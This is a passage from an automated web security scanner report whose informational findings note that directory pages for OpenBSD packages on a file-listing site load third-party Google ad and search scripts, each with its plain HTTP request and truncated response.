<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.106. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X9MgYBFw7AKSbPw/mZFSmA"
Content-Length: 20380
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.107. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uQDTQLRMc6YIbAIQ8/zgLQ"
Content-Length: 13112
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/sparc64/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.108. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RJXDg++Gd640m7L2IsOVRA"
Content-Length: 22403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.109. http://dir.filewatcher.com/d/OpenBSD/4.2.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Y0zdzepuqutGRuMEaf323g"
Content-Length: 5419
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.110. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YboB2yc9PF83jl+NYrQYfA"
Content-Length: 13065
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.111. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GmLk8R3/tGBN7dqZ5++dSA"
Content-Length: 22328
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 156
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.112. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AdTLNYd3xEUnhkpRp6zwlw"
Content-Length: 13024
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 170
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/amd64/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.113. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JkFpCgLlVGqsLda3JsK6lQ"
Content-Length: 22721
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.114. http://dir.filewatcher.com/d/OpenBSD/4.2/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YWfGqri655Liq/jrqHWigA"
Content-Length: 12987
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 170
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.115. http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WggwIsm1hyihQhmXNRbroQ"
Content-Length: 22445
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.116. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/powerpc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/powerpc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WPAiz9MiTz1OHfi6Pk4uFQ"
Content-Length: 13155
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/powerpc/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.117. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qnqcNGV6GTGvBfWiVN/i8A"
Content-Length: 22667
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 162
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.118. http://dir.filewatcher.com/d/OpenBSD/4.3.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.3.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SSR7GaETSRUhQQUTgsEDUA"
Content-Length: 5621
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.3/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.119. http://dir.filewatcher.com/d/OpenBSD/4.3/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.3/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QI5A3VO7vGnuIL9Fr+tYmA"
Content-Length: 12985
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.3/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.120. http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tT6tidPH7IfBUdKWEEVcmQ"
Content-Length: 22893
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.121. http://dir.filewatcher.com/d/OpenBSD/snapshots.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/snapshots.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "La3DrOMkkLlYGCkVDEFg3Q"
Content-Length: 5606
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/snapshots/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
